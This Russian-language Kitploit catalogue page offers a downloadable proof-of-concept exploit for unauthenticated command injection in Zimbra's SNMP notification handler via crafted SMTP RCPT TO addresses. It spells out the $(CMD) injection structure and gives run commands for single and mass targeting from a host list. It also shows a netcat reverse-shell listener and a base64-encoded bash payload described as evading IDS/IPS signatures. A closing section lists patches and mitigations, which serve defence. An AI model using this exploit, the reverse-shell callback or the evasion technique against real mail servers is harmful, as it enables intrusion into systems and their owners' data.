Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-73570 — Zimbra SNMP Notification OS Command Injection — Неаутентифицированное RCE через SMTP-эксплойт (PoC) | Kitploit
Инструменты/GitHubGitHub/gabrielunknown/cve-2026-73570
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubgabrielunknown/cve-2026-73570

CVE-2026-73570

Zimbra SNMP Notification OS Command Injection — Неаутентифицированное RCE через SMTP-эксплойт (PoC)

Репозиторий
11 день назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-73570 — Эксплойт RCE через SNMP-уведомления Zimbra ZCS (PoC)

Неаутентифицированное удалённое выполнение кода через внедрение OS-команд в обработчик SNMP-уведомлений Zimbra Collaboration Suite.


Обзор

ПолеЗначение
CVECVE-2026-73570
CVSS 3.18.9 HIGH — AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L
CWECWE-78 — Некорректная нейтрализация специальных элементов, используемых в OS-команде
ЗатронутоZimbra ZCS < 10.1.20 (с установленным zimbra-snmp)
Исправлено вZCS 10.1.20 — июль 2026
CISA KEVДобавлено 2026-08-21 (крайний срок устранения FCEB: 2026-08-24)
Требуется аутентификацияНет
Выполнение от имениOS-пользователь zimbra

Первопричина

Дополнительный пакет zimbra-snmp включает правило swatchdog, которое отслеживает /var/log/zimbra.log на предмет строк, соответствующих:

root@kitploit:~
Service status change: <NAME> changed from <STATE> to <STATE>

При обнаружении совпадения swatchdog передаёт захваченное поле <NAME> напрямую в скрипт SNMP-уведомления без какой-либо санитизации.

Неаутентифицированный злоумышленник может внедрить специально сформированную запись журнала, отправив особым образом составленную SMTP-команду RCPT TO. Используя заключённую в кавычки локальную часть согласно RFC 5321, метасимволы оболочки — например, $(...) — встраиваются внутрь <NAME> и выполняются, когда swatchdog обрабатывает полученную строку журнала.


Предварительные условия

Для эксплуатации уязвимости на целевой системе должны выполняться все три условия:

  • Установлен пакет zimbra-snmp
  • Включены SNMP-уведомления (snmp_notify = true)
  • Запущен сервис swatchdog

Схема атаки

root@kitploit:~
Attacker                          Zimbra MTA
   │                                  │
   │── TCP connect :25/:465/:587 ────►│
   │── EHLO mx-test.invalid ─────────►│
   │── MAIL FROM:<scanner@...> ──────►│
   │── RCPT TO:<"x: Service status    │
   │     change: localhost $(CMD)     │
   │     changed from stopped to      │
   │     running"@cve.invalid> ──────►│
   │                                  │── логирует данные RCPT TO ──► /var/log/zimbra.log
   │                                  │                               │
   │                                  │                         swatchdog находит
   │                                  │                         совпадение, извлекает
   │                                  │                         $(CMD), выполняет
   │◄─────────── shell callback ───────────────────────────────────────┘
  1. Подключитесь к порту 25 / 465 / 587.
  2. Проведите стандартный SMTP-диалог с «вооружённой» командой RCPT TO.
  3. Zimbra записывает данные адреса в журнал независимо от принятия/отклонения.
  4. swatchdog находит совпадение с шаблоном и извлекает внедрённый $(CMD).
  5. Обработчик SNMP выполняет CMD от имени OS-пользователя zimbra.

Эксплойт

Требования

root@kitploit:~
cpan IO::Socket::SSL MIME::Base64 Digest::HMAC_MD5

Одиночная цель

root@kitploit:~
perl zimbra-poc.pl -H mail.target.com -r <YOUR_IP> -R 4444

Список целей

root@kitploit:~
perl zimbra-poc.pl -f targets.txt -r <YOUR_IP> -R 4444

targets.txt — по одному хосту на строку, опционально :port, строки, начинающиеся с #, игнорируются:

root@kitploit:~
mail.example.com
mail.example.com:25
10.0.0.50:587
# ignored comment

Все параметры

ФлагДлинныйПо умолчаниюОписание
-H--host—Имя хоста или IP одиночной цели
-f--file—Файл со списком целей
-p--port587Порт SMTP по умолчанию
-r--rhost—Ваш IP для обратного вызова reverse shell
-R--rport4444Порт прослушивателя
-t--timeout15Таймаут сокета в секундах
-S--sslвыклПрямой TLS (автовключение на порту 465)
-v--verboseвыклВывод полного SMTP-диалога
-L--logfile—Запись журнала сеанса в файл
-h--help—Показать справку

Полный пример

root@kitploit:~
# Терминал 1 — запуск прослушивателя
nc -lvnp 4444

# Терминал 2 — запуск эксплойта
perl zimbra-poc.pl -H mail.target.com -r 10.10.10.1 -R 4444 -v

Техника полезной нагрузки

Команда reverse shell кодируется в base64 перед внедрением:

root@kitploit:~
echo <b64>|base64 -d|bash

Это предотвращает сопоставление IDS/IPS с сигнатурами открытого текста, такими как /dev/tcp, bash -i или nc -e. Закодированный блок внедряется как $(...) внутри заключённой в кавычки локальной части RCPT TO, что запускает выполнение на стороне сервера, когда swatchdog обрабатывает запись журнала.


Смягчение

ДействиеДетали
ПатчОбновитесь до Zimbra ZCS ≥ 10.1.20
Отключить SNMP-уведомленияzmprov mcf zimbraSnmpNotifyEnabled FALSE && zmconfigdctl restart
Удалить пакетapt remove zimbra-snmp / yum remove zimbra-snmp
Сетевые мерыОграничьте входящий SMTP (25/465/587) доверенными релеями, где это операционно возможно

Ссылки

  • NVD — CVE-2026-73570
  • Zimbra Security Advisories
  • CISA Known Exploited Vulnerabilities — CVE-2026-73570
  • CERT.pl advisory
  • BiuTrap/CVE-2026-73570

Отказ от ответственности

Эта proof-of-concept версия выпущена только для авторизованного тестирования безопасности, академических исследований и защитных целей.
Запуск её против систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения, является незаконным.
Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.


Скачать инструмент